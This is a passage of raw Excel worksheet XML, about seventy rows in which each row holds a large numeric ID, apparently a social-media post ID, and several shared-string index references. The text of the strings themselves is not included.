    <row r="270" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A270">
        <v>1.2357699916995799E+18</v>
      </c>
      <c r="B270" t="s">
        <v>773</v>
      </c>
      <c r="C270" t="s">
        <v>1</v>
      </c>
      <c r="D270" t="s">
        <v>774</v>
      </c>
      <c r="E270" t="s">
        <v>775</v>
      </c>
      <c r="F270" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="271" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A271">
        <v>1.2357695725250299E+18</v>
      </c>
      <c r="B271" t="s">
        <v>776</v>
      </c>
      <c r="C271" t="s">
        <v>1</v>
      </c>
      <c r="D271" t="s">
        <v>777</v>
      </c>
      <c r="E271" t="s">
        <v>514</v>
      </c>
      <c r="F271" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="272" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A272">
        <v>1.2357685446269801E+18</v>
      </c>
      <c r="B272" t="s">
        <v>778</v>
      </c>
      <c r="C272" t="s">
        <v>1</v>
      </c>
      <c r="D272" t="s">
        <v>779</v>
      </c>
      <c r="E272" t="s">
        <v>780</v>
      </c>
      <c r="F272" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="273" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A273">
        <v>1.2357683238346299E+18</v>
      </c>
      <c r="B273" t="s">
        <v>781</v>
      </c>
      <c r="C273" t="s">
        <v>1</v>
      </c>
      <c r="D273" t="s">
        <v>782</v>
      </c>
      <c r="E273" t="s">
        <v>783</v>
      </c>
      <c r="F273" t="s">
        <v>22562</v>
      </c>
    </row>
    <row r="274" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A274">
        <v>1.2357678153883899E+18</v>
      </c>
      <c r="B274" t="s">
        <v>784</v>
      </c>
      <c r="C274" t="s">
        <v>1</v>
      </c>
      <c r="D274" t="s">
        <v>785</v>
      </c>
      <c r="E274" t="s">
        <v>786</v>
      </c>
      <c r="F274" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="275" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A275">
        <v>1.23576770065325E+18</v>
      </c>
      <c r="B275" t="s">
        <v>787</v>
      </c>
      <c r="C275" t="s">
        <v>1</v>
      </c>
      <c r="D275" t="s">
        <v>788</v>
      </c>
      <c r="E275" t="s">
        <v>789</v>
      </c>
      <c r="F275" t="s">
        <v>22559</v>
      </c>
    </row>
    <row r="276" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A276">
        <v>1.2357675322351601E+18</v>
      </c>
      <c r="B276" t="s">
        <v>790</v>
      </c>
      <c r="C276" t="s">
        <v>1</v>
      </c>
      <c r="D276" t="s">
        <v>791</v>
      </c>
      <c r="E276" t="s">
        <v>792</v>
      </c>
      <c r="F276" t="s">
        <v>22559</v>
      </c>
    </row>
    <row r="277" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A277">
        <v>1.2357667902040699E+18</v>
      </c>
      <c r="B277" t="s">
        <v>793</v>
      </c>
      <c r="C277" t="s">
        <v>1</v>
      </c>
      <c r="D277" t="s">
        <v>794</v>
      </c>
      <c r="E277" t="s">
        <v>795</v>
      </c>
      <c r="F277" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="278" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A278">
        <v>1.2357664582165801E+18</v>
      </c>
      <c r="B278" t="s">
        <v>796</v>
      </c>
      <c r="C278" t="s">
        <v>1</v>
      </c>
      <c r="D278" t="s">
        <v>797</v>
      </c>
      <c r="E278" t="s">
        <v>798</v>
      </c>
      <c r="F278" t="s">
        <v>22559</v>
      </c>
    </row>
    <row r="279" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A279">
        <v>1.23576610145327E+18</v>
      </c>
      <c r="B279" t="s">
        <v>799</v>
      </c>
      <c r="C279" t="s">
        <v>1</v>
      </c>
      <c r="D279" t="s">
        <v>800</v>
      </c>
      <c r="E279" t="s">
        <v>801</v>
      </c>
      <c r="F279" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="280" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A280">
        <v>1.2357651412512599E+18</v>
      </c>
      <c r="B280" t="s">
        <v>802</v>
      </c>
      <c r="C280" t="s">
        <v>1</v>
      </c>
      <c r="D280" t="s">
        <v>803</v>
      </c>
      <c r="E280" t="s">
        <v>804</v>
      </c>
      <c r="F280" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="281" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A281">
        <v>1.2357649179087501E+18</v>
      </c>
      <c r="B281" t="s">
        <v>805</v>
      </c>
      <c r="C281" t="s">
        <v>1</v>
      </c>
      <c r="D281" t="s">
        <v>806</v>
      </c>
      <c r="E281" t="s">
        <v>807</v>
      </c>
      <c r="F281" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="282" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A282">
        <v>1.2357633140025001E+18</v>
      </c>
      <c r="B282" t="s">
        <v>808</v>
      </c>
      <c r="C282" t="s">
        <v>1</v>
      </c>
      <c r="D282" t="s">
        <v>809</v>
      </c>
      <c r="E282" t="s">
        <v>466</v>
      </c>
      <c r="F282" t="s">
        <v>22559</v>
      </c>
    </row>
    <row r="283" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A283">
        <v>1.23576286976722E+18</v>
      </c>
      <c r="B283" t="s">
        <v>810</v>
      </c>
      <c r="C283" t="s">
        <v>1</v>
      </c>
      <c r="D283" t="s">
        <v>811</v>
      </c>
      <c r="E283" t="s">
        <v>812</v>
      </c>
      <c r="F283" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="284" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A284">
        <v>1.23576226373632E+18</v>
      </c>
      <c r="B284" t="s">
        <v>813</v>
      </c>
      <c r="C284" t="s">
        <v>1</v>
      </c>
      <c r="D284" t="s">
        <v>814</v>
      </c>
      <c r="E284" t="s">
        <v>384</v>
      </c>
      <c r="F284" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="285" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A285">
        <v>1.23576223112144E+18</v>
      </c>
      <c r="B285" t="s">
        <v>815</v>
      </c>
      <c r="C285" t="s">
        <v>1</v>
      </c>
      <c r="D285" t="s">
        <v>816</v>
      </c>
      <c r="E285" t="s">
        <v>817</v>
      </c>
      <c r="F285" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="286" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A286">
        <v>1.2357621850932301E+18</v>
      </c>
      <c r="B286" t="s">
        <v>818</v>
      </c>
      <c r="C286" t="s">
        <v>1</v>
      </c>
      <c r="D286" t="s">
        <v>819</v>
      </c>
      <c r="E286" t="s">
        <v>820</v>
      </c>
      <c r="F286" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="287" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A287">
        <v>1.23576209389647E+18</v>
      </c>
      <c r="B287" t="s">
        <v>821</v>
      </c>
      <c r="C287" t="s">
        <v>1</v>
      </c>
      <c r="D287" t="s">
        <v>822</v>
      </c>
      <c r="E287" t="s">
        <v>823</v>
      </c>
      <c r="F287" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="288" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A288">
        <v>1.2357615943296901E+18</v>
      </c>
      <c r="B288" t="s">
        <v>824</v>
      </c>
      <c r="C288" t="s">
        <v>1</v>
      </c>
      <c r="D288" t="s">
        <v>825</v>
      </c>
      <c r="E288" t="s">
        <v>826</v>
      </c>
      <c r="F288" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="289" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A289">
        <v>1.2357609462215401E+18</v>
      </c>
      <c r="B289" t="s">
        <v>827</v>
      </c>
      <c r="C289" t="s">
        <v>1</v>
      </c>
      <c r="D289" t="s">
        <v>828</v>
      </c>
      <c r="E289" t="s">
        <v>829</v>
      </c>
      <c r="F289" t="s">
        <v>22559</v>
      </c>
    </row>
    <row r="290" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A290">
        <v>1.2357609322545999E+18</v>
      </c>
      <c r="B290" t="s">
        <v>830</v>
      </c>
      <c r="C290" t="s">
        <v>1</v>
      </c>
      <c r="D290" t="s">
        <v>831</v>
      </c>
      <c r="E290" t="s">
        <v>829</v>
      </c>
      <c r="F290" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="291" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A291">
        <v>1.23576092679357E+18</v>
      </c>
      <c r="B291" t="s">
        <v>832</v>
      </c>
      <c r="C291" t="s">
        <v>1</v>
      </c>
      <c r="D291" t="s">
        <v>833</v>
      </c>
      <c r="E291" t="s">
        <v>829</v>
      </c>
      <c r="F291" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="292" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A292">
        <v>1.2357609251746099E+18</v>
      </c>
      <c r="B292" t="s">
        <v>832</v>
      </c>
      <c r="C292" t="s">
        <v>1</v>
      </c>
      <c r="D292" t="s">
        <v>834</v>
      </c>
      <c r="E292" t="s">
        <v>829</v>
      </c>
      <c r="F292" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="293" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A293">
        <v>1.23576091814915E+18</v>
      </c>
      <c r="B293" t="s">
        <v>835</v>
      </c>
      <c r="C293" t="s">
        <v>1</v>
      </c>
      <c r="D293" t="s">
        <v>836</v>
      </c>
      <c r="E293" t="s">
        <v>829</v>
      </c>
      <c r="F293" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="294" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A294">
        <v>1.23576091542286E+18</v>
      </c>
      <c r="B294" t="s">
        <v>835</v>
      </c>
      <c r="C294" t="s">
        <v>1</v>
      </c>
      <c r="D294" t="s">
        <v>837</v>
      </c>
      <c r="E294" t="s">
        <v>829</v>
      </c>
      <c r="F294" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="295" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A295">
        <v>1.23576091338862E+18</v>
      </c>
      <c r="B295" t="s">
        <v>838</v>
      </c>
      <c r="C295" t="s">
        <v>1</v>
      </c>
      <c r="D295" t="s">
        <v>839</v>
      </c>
      <c r="E295" t="s">
        <v>829</v>
      </c>
      <c r="F295" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="296" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A296">
        <v>1.2357609093955899E+18</v>
      </c>
      <c r="B296" t="s">
        <v>840</v>
      </c>
      <c r="C296" t="s">
        <v>1</v>
      </c>
      <c r="D296" t="s">
        <v>841</v>
      </c>
      <c r="E296" t="s">
        <v>829</v>
      </c>
      <c r="F296" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="297" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A297">
        <v>1.23576090762979E+18</v>
      </c>
      <c r="B297" t="s">
        <v>840</v>
      </c>
      <c r="C297" t="s">
        <v>1</v>
      </c>
      <c r="D297" t="s">
        <v>842</v>
      </c>
      <c r="E297" t="s">
        <v>829</v>
      </c>
      <c r="F297" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="298" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A298">
        <v>1.23576090437507E+18</v>
      </c>
      <c r="B298" t="s">
        <v>843</v>
      </c>
      <c r="C298" t="s">
        <v>1</v>
      </c>
      <c r="D298" t="s">
        <v>844</v>
      </c>
      <c r="E298" t="s">
        <v>829</v>
      </c>
      <c r="F298" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="299" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A299">
        <v>1.2357609040479099E+18</v>
      </c>
      <c r="B299" t="s">
        <v>843</v>
      </c>
      <c r="C299" t="s">
        <v>1</v>
      </c>
      <c r="D299" t="s">
        <v>845</v>
      </c>
      <c r="E299" t="s">
        <v>846</v>
      </c>
      <c r="F299" t="s">
        <v>22559</v>
      </c>
    </row>
    <row r="300" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A300">
        <v>1.2357609001178501E+18</v>
      </c>
      <c r="B300" t="s">
        <v>847</v>
      </c>
      <c r="C300" t="s">
        <v>1</v>
      </c>
      <c r="D300" t="s">
        <v>848</v>
      </c>
      <c r="E300" t="s">
        <v>829</v>
      </c>
      <c r="F300" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="301" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A301">
        <v>1.2357608965274299E+18</v>
      </c>
      <c r="B301" t="s">
        <v>849</v>
      </c>
      <c r="C301" t="s">
        <v>1</v>
      </c>
      <c r="D301" t="s">
        <v>850</v>
      </c>
      <c r="E301" t="s">
        <v>829</v>
      </c>
      <c r="F301" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="302" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A302">
        <v>1.2357608918970099E+18</v>
      </c>
      <c r="B302" t="s">
        <v>851</v>
      </c>
      <c r="C302" t="s">
        <v>1</v>
      </c>
      <c r="D302" t="s">
        <v>852</v>
      </c>
      <c r="E302" t="s">
        <v>829</v>
      </c>
      <c r="F302" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="303" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A303">
        <v>1.2357608845695099E+18</v>
      </c>
      <c r="B303" t="s">
        <v>853</v>
      </c>
      <c r="C303" t="s">
        <v>1</v>
      </c>
      <c r="D303" t="s">
        <v>854</v>
      </c>
      <c r="E303" t="s">
        <v>829</v>
      </c>
      <c r="F303" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="304" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A304">
        <v>1.2357608815328901E+18</v>
      </c>
      <c r="B304" t="s">
        <v>853</v>
      </c>
      <c r="C304" t="s">
        <v>1</v>
      </c>
      <c r="D304" t="s">
        <v>855</v>
      </c>
      <c r="E304" t="s">
        <v>829</v>
      </c>
      <c r="F304" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="305" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A305">
        <v>1.2357608789491999E+18</v>
      </c>
      <c r="B305" t="s">
        <v>856</v>
      </c>
      <c r="C305" t="s">
        <v>1</v>
      </c>
      <c r="D305" t="s">
        <v>857</v>
      </c>
      <c r="E305" t="s">
        <v>829</v>
      </c>
      <c r="F305" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="306" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A306">
        <v>1.2357608738069901E+18</v>
      </c>
      <c r="B306" t="s">
        <v>858</v>
      </c>
      <c r="C306" t="s">
        <v>1</v>
      </c>
      <c r="D306" t="s">
        <v>859</v>
      </c>
      <c r="E306" t="s">
        <v>829</v>
      </c>
      <c r="F306" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="307" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A307">
        <v>1.2357608669241101E+18</v>
      </c>
      <c r="B307" t="s">
        <v>860</v>
      </c>
      <c r="C307" t="s">
        <v>1</v>
      </c>
      <c r="D307" t="s">
        <v>861</v>
      </c>
      <c r="E307" t="s">
        <v>829</v>
      </c>
      <c r="F307" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="308" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A308">
        <v>1.2357608655483E+18</v>
      </c>
      <c r="B308" t="s">
        <v>860</v>
      </c>
      <c r="C308" t="s">
        <v>1</v>
      </c>
      <c r="D308" t="s">
        <v>862</v>
      </c>
      <c r="E308" t="s">
        <v>829</v>
      </c>
      <c r="F308" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="309" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A309">
        <v>1.2357608636525599E+18</v>
      </c>
      <c r="B309" t="s">
        <v>863</v>
      </c>
      <c r="C309" t="s">
        <v>1</v>
      </c>
      <c r="D309" t="s">
        <v>864</v>
      </c>
      <c r="E309" t="s">
        <v>829</v>
      </c>
      <c r="F309" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="310" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A310">
        <v>1.23576086061171E+18</v>
      </c>
      <c r="B310" t="s">
        <v>863</v>
      </c>
      <c r="C310" t="s">
        <v>1</v>
      </c>
      <c r="D310" t="s">
        <v>865</v>
      </c>
      <c r="E310" t="s">
        <v>829</v>
      </c>
      <c r="F310" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="311" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A311">
        <v>1.23576085775119E+18</v>
      </c>
      <c r="B311" t="s">
        <v>866</v>
      </c>
      <c r="C311" t="s">
        <v>1</v>
      </c>
      <c r="D311" t="s">
        <v>867</v>
      </c>
      <c r="E311" t="s">
        <v>829</v>
      </c>
      <c r="F311" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="312" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A312">
        <v>1.23576085166946E+18</v>
      </c>
      <c r="B312" t="s">
        <v>868</v>
      </c>
      <c r="C312" t="s">
        <v>1</v>
      </c>
      <c r="D312" t="s">
        <v>869</v>
      </c>
      <c r="E312" t="s">
        <v>829</v>
      </c>
      <c r="F312" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="313" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A313">
        <v>1.23576084758414E+18</v>
      </c>
      <c r="B313" t="s">
        <v>870</v>
      </c>
      <c r="C313" t="s">
        <v>1</v>
      </c>
      <c r="D313" t="s">
        <v>871</v>
      </c>
      <c r="E313" t="s">
        <v>829</v>
      </c>
      <c r="F313" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="314" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A314">
        <v>1.23576084502976E+18</v>
      </c>
      <c r="B314" t="s">
        <v>872</v>
      </c>
      <c r="C314" t="s">
        <v>1</v>
      </c>
      <c r="D314" t="s">
        <v>873</v>
      </c>
      <c r="E314" t="s">
        <v>829</v>
      </c>
      <c r="F314" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="315" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A315">
        <v>1.2357608410704399E+18</v>
      </c>
      <c r="B315" t="s">
        <v>874</v>
      </c>
      <c r="C315" t="s">
        <v>1</v>
      </c>
      <c r="D315" t="s">
        <v>875</v>
      </c>
      <c r="E315" t="s">
        <v>829</v>
      </c>
      <c r="F315" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="316" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A316">
        <v>1.2357608355086899E+18</v>
      </c>
      <c r="B316" t="s">
        <v>876</v>
      </c>
      <c r="C316" t="s">
        <v>1</v>
      </c>
      <c r="D316" t="s">
        <v>877</v>
      </c>
      <c r="E316" t="s">
        <v>829</v>
      </c>
      <c r="F316" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="317" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A317">
        <v>1.23576083358355E+18</v>
      </c>
      <c r="B317" t="s">
        <v>878</v>
      </c>
      <c r="C317" t="s">
        <v>1</v>
      </c>
      <c r="D317" t="s">
        <v>879</v>
      </c>
      <c r="E317" t="s">
        <v>829</v>
      </c>
      <c r="F317" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="318" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A318">
        <v>1.2357608313522601E+18</v>
      </c>
      <c r="B318" t="s">
        <v>878</v>
      </c>
      <c r="C318" t="s">
        <v>1</v>
      </c>
      <c r="D318" t="s">
        <v>880</v>
      </c>
      <c r="E318" t="s">
        <v>829</v>
      </c>
      <c r="F318" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="319" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A319">
        <v>1.2357608298673999E+18</v>
      </c>
      <c r="B319" t="s">
        <v>881</v>
      </c>
      <c r="C319" t="s">
        <v>1</v>
      </c>
      <c r="D319" t="s">
        <v>882</v>
      </c>
      <c r="E319" t="s">
        <v>829</v>
      </c>
      <c r="F319" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="320" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A320">
        <v>1.2357598525945201E+18</v>
      </c>
      <c r="B320" t="s">
        <v>883</v>
      </c>
      <c r="C320" t="s">
        <v>1</v>
      </c>
      <c r="D320" t="s">
        <v>884</v>
      </c>
      <c r="E320" t="s">
        <v>885</v>
      </c>
      <c r="F320" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="321" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A321">
        <v>1.2357592057700401E+18</v>
      </c>
      <c r="B321" t="s">
        <v>886</v>
      </c>
      <c r="C321" t="s">
        <v>1</v>
      </c>
      <c r="D321" t="s">
        <v>887</v>
      </c>
      <c r="E321" t="s">
        <v>888</v>
      </c>
      <c r="F321" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="322" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A322">
        <v>1.2357582479712901E+18</v>
      </c>
      <c r="B322" t="s">
        <v>889</v>
      </c>
      <c r="C322" t="s">
        <v>1</v>
      </c>
      <c r="D322" t="s">
        <v>890</v>
      </c>
      <c r="E322" t="s">
        <v>891</v>
      </c>
      <c r="F322" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="323" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A323">
        <v>1.23575814543315E+18</v>
      </c>
      <c r="B323" t="s">
        <v>892</v>
      </c>
      <c r="C323" t="s">
        <v>1</v>
      </c>
      <c r="D323" t="s">
        <v>893</v>
      </c>
      <c r="E323" t="s">
        <v>885</v>
      </c>
      <c r="F323" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="324" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A324">
        <v>1.2357573416661499E+18</v>
      </c>
      <c r="B324" t="s">
        <v>894</v>
      </c>
      <c r="C324" t="s">
        <v>1</v>
      </c>
      <c r="D324" t="s">
        <v>895</v>
      </c>
      <c r="E324" t="s">
        <v>896</v>
      </c>
      <c r="F324" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="325" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A325">
        <v>1.23575729680387E+18</v>
      </c>
      <c r="B325" t="s">
        <v>897</v>
      </c>
      <c r="C325" t="s">
        <v>1</v>
      </c>
      <c r="D325" t="s">
        <v>898</v>
      </c>
      <c r="E325" t="s">
        <v>899</v>
      </c>
      <c r="F325" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="326" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A326">
        <v>1.23575697143057E+18</v>
      </c>
      <c r="B326" t="s">
        <v>900</v>
      </c>
      <c r="C326" t="s">
        <v>1</v>
      </c>
      <c r="D326" t="s">
        <v>901</v>
      </c>
      <c r="E326" t="s">
        <v>899</v>
      </c>
      <c r="F326" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="327" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A327">
        <v>1.23575662195713E+18</v>
      </c>
      <c r="B327" t="s">
        <v>902</v>
      </c>
      <c r="C327" t="s">
        <v>1</v>
      </c>
      <c r="D327" t="s">
        <v>903</v>
      </c>
      <c r="E327" t="s">
        <v>899</v>
      </c>
      <c r="F327" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="328" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A328">
        <v>1.2357560944562401E+18</v>
      </c>
      <c r="B328" t="s">
        <v>904</v>
      </c>
      <c r="C328" t="s">
        <v>1</v>
      </c>
      <c r="D328" t="s">
        <v>905</v>
      </c>
      <c r="E328" t="s">
        <v>899</v>
      </c>
      <c r="F328" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="329" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A329">
        <v>1.2357559889149199E+18</v>
      </c>
      <c r="B329" t="s">
        <v>906</v>
      </c>
      <c r="C329" t="s">
        <v>1</v>
      </c>
      <c r="D329" t="s">
        <v>907</v>
      </c>
      <c r="E329" t="s">
        <v>899</v>
      </c>
      <c r="F329" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="330" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A330">
        <v>1.23575595975197E+18</v>
      </c>
      <c r="B330" t="s">
        <v>908</v>
      </c>
      <c r="C330" t="s">
        <v>1</v>
      </c>
      <c r="D330" t="s">
        <v>909</v>
      </c>
      <c r="E330" t="s">
        <v>910</v>
      </c>
      <c r="F330" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="331" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A331">
        <v>1.2357559013253601E+18</v>
      </c>
      <c r="B331" t="s">
        <v>911</v>
      </c>
      <c r="C331" t="s">
        <v>1</v>
      </c>
      <c r="D331" t="s">
        <v>912</v>
      </c>
      <c r="E331" t="s">
        <v>899</v>
      </c>
      <c r="F331" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="332" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A332">
        <v>1.2357558047053901E+18</v>
      </c>
      <c r="B332" t="s">
        <v>913</v>
      </c>
      <c r="C332" t="s">
        <v>1</v>
      </c>
      <c r="D332" t="s">
        <v>914</v>
      </c>
      <c r="E332" t="s">
        <v>915</v>
      </c>
      <c r="F332" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="333" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A333">
        <v>1.2357557421389599E+18</v>
      </c>
      <c r="B333" t="s">
        <v>916</v>
      </c>
      <c r="C333" t="s">
        <v>1</v>
      </c>
      <c r="D333" t="s">
        <v>917</v>
      </c>
      <c r="E333" t="s">
        <v>918</v>
      </c>
      <c r="F333" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="334" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A334">
        <v>1.23575561513101E+18</v>
      </c>
      <c r="B334" t="s">
        <v>919</v>
      </c>
      <c r="C334" t="s">
        <v>1</v>
      </c>
      <c r="D334" t="s">
        <v>920</v>
      </c>
      <c r="E334" t="s">
        <v>921</v>
      </c>
      <c r="F334" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="335" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A335">
        <v>1.2357554948635599E+18</v>
      </c>
      <c r="B335" t="s">
        <v>922</v>
      </c>
      <c r="C335" t="s">
        <v>1</v>
      </c>
      <c r="D335" t="s">
        <v>923</v>
      </c>
      <c r="E335" t="s">
        <v>924</v>
      </c>
      <c r="F335" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="336" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A336">
        <v>1.2357548966677499E+18</v>
      </c>
      <c r="B336" t="s">
        <v>925</v>
      </c>
      <c r="C336" t="s">
        <v>1</v>
      </c>
      <c r="D336" t="s">
        <v>926</v>
      </c>
      <c r="E336" t="s">
        <v>927</v>
      </c>
      <c r="F336" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="337" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A337">
        <v>1.23575484413841E+18</v>
      </c>
      <c r="B337" t="s">
        <v>928</v>
      </c>
      <c r="C337" t="s">
        <v>1</v>
      </c>
      <c r="D337" t="s">
        <v>929</v>
      </c>
      <c r="E337" t="s">
        <v>930</v>
      </c>
      <c r="F337" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="338" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A338">
        <v>1.2357543765824399E+18</v>
      </c>
      <c r="B338" t="s">
        <v>931</v>
      </c>
      <c r="C338" t="s">
        <v>1</v>
      </c>
      <c r="D338" t="s">
        <v>932</v>
      </c>
      <c r="E338" t="s">
        <v>933</v>
      </c>
      <c r="F338" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="339" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A339">
        <v>1.2357535500656E+18</v>
      </c>
      <c r="B339" t="s">
        <v>934</v>
      </c>
      <c r="C339" t="s">
        <v>1</v>
      </c>
      <c r="D339" t="s">
        <v>935</v>
      </c>
      <c r="E339" t="s">
        <v>670</v>
      </c>
      <c r="F339" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="340" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A340">
        <v>1.2357531146717299E+18</v>
      </c>
      <c r="B340" t="s">
        <v>936</v>
      </c>
      <c r="C340" t="s">
        <v>1</v>
      </c>
      <c r="D340" t="s">
        <v>937</v>
      </c>
      <c r="E340" t="s">
        <v>938</v>
      </c>
      <c r="F340" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="341" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A341">
        <v>1.2357521591547599E+18</v>
      </c>
      <c r="B341" t="s">
        <v>939</v>
      </c>
      <c r="C341" t="s">
        <v>1</v>
      </c>
      <c r="D341" t="s">
        <v>940</v>
      </c>
      <c r="E341" t="s">
        <v>941</v>
      </c>
      <c r="F341" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="342" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A342">
        <v>1.23575143709696E+18</v>
      </c>
      <c r="B342" t="s">
        <v>942</v>
      </c>
      <c r="C342" t="s">
        <v>1</v>
      </c>
      <c r="D342" t="s">
        <v>943</v>
      </c>
      <c r="E342" t="s">
        <v>944</v>
      </c>
      <c r="F342" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="343" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A343">
        <v>1.23575129810608E+18</v>
      </c>
      <c r="B343" t="s">
        <v>945</v>
      </c>
      <c r="C343" t="s">
        <v>1</v>
      </c>
      <c r="D343" t="s">
